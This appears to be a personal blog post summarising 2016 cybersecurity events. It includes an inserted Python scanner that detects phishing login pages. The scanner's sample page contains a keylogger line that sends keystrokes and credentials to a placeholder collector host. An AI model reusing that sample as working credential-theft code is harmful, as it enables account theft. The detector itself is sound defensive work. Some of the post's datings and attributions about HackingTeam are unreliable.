My Summary of Cyber Security in 2016

In early 2016, security researchers across the world noticed an increase in ransomware: estimates put the rise in the number of ransomware infections at 200-400%. Ransomware families such as TeslaCrypt, Cerber and Jigsaw, among many others, were propagated through many different channels, including malvertising, file sharing and compromised websites.

For much of 2016, the US presidential election made headlines across the world, with Trump being ridiculed for his policies and beliefs. The Clinton email scandal also prompted an investigation by the FBI, which concluded that she was not guilty. However, this conclusion was disputed by activists and people in the cyber-security industry following the release of the Clinton emails from the breach of her personal email server.

In August 2016, the British Parliament authorised a bill which would allow certain organisations and ISPs to monitor British citizens and users of British internet connections and collect their data. Soon after, the creator of the World Wide Web, Sir Tim Berners-Lee, tweeted “Dark, dark days” in reference to this bill. Some people went further, stating that they would use the Tor anonymity network as well as VPNs to circumvent the collection of their internet traffic.

WikiLeaks released emails from the Italian company HackingTeam, showing that the company had targeted computer security companies, aiming to find vulnerabilities in their software and then exploiting these to prevent its own backdoor and spyware programs from being detected. It was also revealed that HackingTeam had worked with the British counterpart of the NSA, GCHQ, to obtain a warrant to disassemble software belonging to the security companies. This warrant was supposedly issued by the foreign secretary of the United Kingdom sometime in early 2016. The HackingTeam emails also showed that the company used ‘demo’ targets to simulate what its malware would do once a victim’s infrastructure had been infected. Its malware included Remote Access Trojans and backdoor programs running on various operating systems and infrastructures.

In late 2016, internet users across the world experienced the effects of the DDoS attack on Dyn’s services, carried out by the Mirai botnet. This attack disrupted many services, including Twitter, SoundCloud, Spotify and more. Security researchers found that the malware used by the botnet specifically targeted IoT devices as well as home routers. Some hysteria found its way to Twitter, with some users claiming that Russia was behind the attack; however, security experts quickly concluded that the Mirai botnet was mainly based in the United States of America.

With ransomware on the rise, security vendors have been forced to take steps to protect their customers from it. One such effort was the creation of ‘No More Ransom’ (https://nomoreransom.org) by Intel Security, Kaspersky Lab and law enforcement agencies in many countries, aiming not only to help people who had been infected by ransomware, but also to educate them about the growing threat facing today’s computer users. Some ransomware variants even allow victims to decrypt their files by infecting other people with the ransomware.

Yahoo was hit by two massive security breaches. The first exposed the information and personal data of around 500,000,000 people worldwide; the second exposed the personal information of 1,000,000,000 users worldwide. In both instances, Yahoo claimed that it was a state-sponsored attack, which would explain why the breached data has not been released to the public yet. However, some security researchers, such as Troy Hunt, suggested that the phrase ‘state-sponsored’ was simply used to make the breach seem less important to victims, leading them to dismiss it as a minor incident.

2016 also saw a large number of phishing attacks utilising services such as Gmail and Hotmail to trick users into clicking on fake attachments. These fake attachments would open a raw HTML page in the browser, disguised to look like the Google login page. These fake login pages contained keylogger scripts (usually in JavaScript) that would send the victim’s keystrokes to the threat actor behind the phishing attack. If the keylogger failed, the username and password would be sent to the attacker when the user clicked the submit / login button. The user wouldn’t notice anything, as once they had “logged in”, they would be redirected to the real email website.
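The two tell-tale signs in that description, a login form that posts somewhere other than the service it imitates and inline script that hooks keystrokes and talks to an outside host, are both visible in the page source, so a saved attachment can be triaged before anyone opens it in a browser. The scanner below is an added example and not part of the original post: it uses only the Python standard library, the trusted host list and both sample pages are constructed for illustration, and the host names in them (collector.example.net) are placeholders rather than real indicators.

```python
"""Heuristic triage of a saved HTML page for credential-phishing indicators:
a login form whose action points at an untrusted host, and inline script that
hooks keystrokes while contacting a network endpoint."""

import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the imitated login page is expected to talk to (assumption for this example).
TRUSTED_HOSTS = {"accounts.google.com", "login.live.com"}

# addEventListener("keydown"/"keyup"/"keypress", ...) or onkeydown= style handlers
KEY_EVENT_RE = re.compile(
    r"""addEventListener\s*\(\s*['"]key(?:down|up|press)['"]|onkey(?:down|up|press)\s*=""",
    re.I,
)
# Browser APIs that can carry data off the page
EXFIL_API_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


class LoginPageScanner(HTMLParser):
    """Collects form actions, inline scripts and external script sources."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.scripts = []            # inline script bodies and on* handler attributes
        self.external_script_srcs = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            if a.get("src"):
                self.external_script_srcs.append(a["src"])
            else:
                self._in_script = True
                self._script_buf = []
        for name, value in attrs:          # inline handlers such as onkeydown="..."
            if name.startswith("onkey") and value:
                self.scripts.append(f"{name}={value}")

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._script_buf))

    def handle_data(self, data):
        if self._in_script:              # html.parser delivers <script> bodies as data
            self._script_buf.append(data)


def host_of(url):
    """Lower-cased host of an absolute URL; '' for relative URLs or empty actions."""
    return (urlparse(url).hostname or "").lower()


def scan_login_page(html, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of findings; an empty list means nothing was flagged."""
    p = LoginPageScanner()
    p.feed(html)
    p.close()
    findings = []
    for action in p.form_actions:        # relative actions post to the page origin and are not flagged
        h = host_of(action)
        if h and h not in trusted_hosts:
            findings.append(f"form submits credentials to untrusted host {h}")
    for src in p.scripts:
        hooks_keys = bool(KEY_EVENT_RE.search(src))
        uses_net = bool(EXFIL_API_RE.search(src))
        ext_hosts = {host_of(u) for u in URL_RE.findall(src)} - trusted_hosts - {""}
        # A keydown handler alone is normal (Enter submits the form); flag it only with network activity.
        if hooks_keys and (uses_net or ext_hosts):
            target = ", ".join(sorted(ext_hosts)) or "a network endpoint"
            findings.append(f"inline script records keystrokes and contacts {target}")
    for src in p.external_script_srcs:
        h = host_of(src)
        if h and h not in trusted_hosts:
            findings.append(f"external script loaded from untrusted host {h}")
    return findings


# Constructed sample pages (not real captures); collector.example.net is a placeholder.
SUSPICIOUS_PAGE = """<html><body>
<form action="https://collector.example.net/post.php" method="post">
  <input name="Email"><input name="Passwd" type="password">
  <button type="submit">Sign in</button>
</form>
<script>
  window.addEventListener("keydown", logKey);
  navigator.sendBeacon("https://collector.example.net/k", typed);
</script>
</body></html>"""

BENIGN_PAGE = """<html><body>
<form action="https://accounts.google.com/signin/challenge" method="post">
  <input name="Email"><input name="Passwd" type="password">
</form>
<script>
  document.addEventListener("keydown", function (e) { if (e.key === "Enter") {} });
</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("suspicious", SUSPICIOUS_PAGE), ("benign", BENIGN_PAGE)):
        print(label, "->", scan_login_page(page) or "no findings")
```

Run against a directory of quarantined attachments, this gives a first-pass verdict without rendering anything; the trusted host set should be built from the brand the page imitates, and a hit on either heuristic is a reason to block the sender and check the mail logs for other recipients.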

With 2016 coming to an end, I want to wish everyone a happy holiday! In terms of Information Security, 2016 has been a crazy year. I used various services / information sources to research this year’s events before writing this blog post. They can be found below:
